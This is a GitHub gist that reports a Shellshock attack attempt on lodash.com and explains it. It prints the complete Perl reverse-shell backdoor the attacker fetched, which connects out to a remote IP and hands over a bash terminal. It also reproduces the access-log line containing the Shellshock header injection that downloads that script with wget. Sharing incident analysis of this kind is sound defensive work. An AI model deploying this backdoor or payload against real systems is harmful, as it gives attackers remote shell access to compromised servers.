Skip to content

Instantly share code, notes, and snippets.

@mathiasbynens

mathiasbynens/README.md

Last active August 29, 2015 14:06
Show Gist options
  • Save mathiasbynens/677013ced9abded4a8f8 to your computer and use it in GitHub Desktop.
Save mathiasbynens/677013ced9abded4a8f8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
README.md

Someone tried to exploit the Shellshock vulnerability in Bash on lodash.com, likely as part of a mass-exploit attempt.

In this case, the exploit attempted to download a modified version of @schierlm’s pseudo-terminal Perl script that would connect to 72.167.37.182 on port 23. The download URL contains the targeted host name (?h=lodash.com) which gives the attacker an indication of which hosts might have the /tmp/a.pl backdoor in place.

Raw
a.pl
#!/usr/bin/perl -w
use IO::Socket;
use Fcntl;
# IOCTLs
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN=11;
print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
$HOST="72.167.37.182";
$PORT="23";
$0="apache";
print "Connecting to $HOST:$PORT... ";
$sock = new IO::Socket::INET (
PeerAddr => $HOST,
PeerPort => $PORT,
Proto => 'tcp',
Blocking => 0,
) or die $!;
print "ok\nAllocatig pseudo terminal... ";
## ptsname
sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
$tmp='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);
print "/dev/pts/$pts\nInitializing pseudo terminal... ";
## grantpt not needed on devpts
## unlockpt
$unlock=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
## prepare daemonizing
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;
print "ok\nForking shell thread...";
defined($pid = fork) or die $!;
exit if $pid;
defined($pid = fork) or die $!;
if (!$pid) {
exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
die $!;
exit;
}
print "ok\nHave fun!\n";
open STDOUT, '>>/dev/null' or die $!;
open STDERR, '>>/dev/null' or die $!;
$pp = PTMX;
$rin=$win=$ein='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;
select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished=0;
sub forwarddata {
my ($from,$to) = @_;
while(1) {
$rv = sysread($from, $buff, 1024);
last if (!defined($rv) && $! == $EAGAIN);
defined($rv) or die $!;
if ($rv == 0) { $finished = 1; last;}
while(length $buff > 0) {
$rv = syswrite($to, $buff, length $buff);
if (!defined($rv) && $! == $EAGAIN) {
## try again
next;
}
defined($rv) or die $!;
last if ($rv == length $buff);
substr($buff,0,$rv) = '';
}
}
}
while(! $finished) {
$nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
die $! if ($nfound == -1);
forwarddata($pp,$sock);
last if $finished;
forwarddata($sock,$pp);
last if $finished;
}
close PTMX;
close $sock;
$wout=$eout.$wout.$rout;
Raw
lodash.com-access.log
109.95.210.196 - - [26/Sep/2014:06:36:30 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=lodash.com -O /tmp/a.pl\""
@schierlm
Copy link

Wow, people are using old scripts of mine and are even too lazy to remove the copyright notice :)

Nowadays, in most cases you can use script /dev/null instead to allocate you a pseudo terminal. But I wouldn't use it in intiial exploitation (only where I have permission of course, I don't access random hosts on the 'net) anyway - just give me a "raw shell", I can later upgrade it if needed :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment